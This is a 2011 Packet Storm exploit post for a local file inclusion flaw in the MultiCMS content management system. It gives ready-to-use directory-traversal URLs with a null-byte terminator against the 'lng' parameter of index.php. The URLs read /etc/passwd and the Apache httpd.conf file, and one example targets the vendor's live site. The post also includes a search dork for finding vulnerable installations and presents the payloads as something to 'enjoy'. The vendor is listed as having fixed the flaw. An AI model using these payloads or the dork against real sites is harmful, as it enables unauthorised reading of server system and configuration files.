MultiCMS Local File Inclusion

2011-01-29T00:00:00
ID PACKETSTORM:97987
Type packetstorm
Reporter R3VAN_BASTARD
Modified 2011-01-29T00:00:00

Description

                                        
                                            `=============================www[dot]Whiteponny[dot]com=============================  
# Date: 29/01/2011  
# Author: R3VAN_BASTARD  
# Exploit Title: MultiCMS File Inclusion Vulnerbility  
# Vendor: http://www.multicms.net  
# Status: FIXED  
# Tested on: Windows 7  
# Dork: "Redakcní systém MultiCMS"  
# Mail: defrontliner@whiteponny.com  
================================================================================  
# File: /Index.php?lng=[LFI]  
# XPL: http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00  
http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00   
  
# Ex: http://www.multicms.net/index.php?lng=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00  
  
Enjoy! :D  
================================================================================  
Thanks To: Madonk "Makasih udah nemenin Scan :D"  
S3T4N a.k.a Zeth.  
All My Friends  
=============================www[dot]Whiteponny[dot]com=============================  
`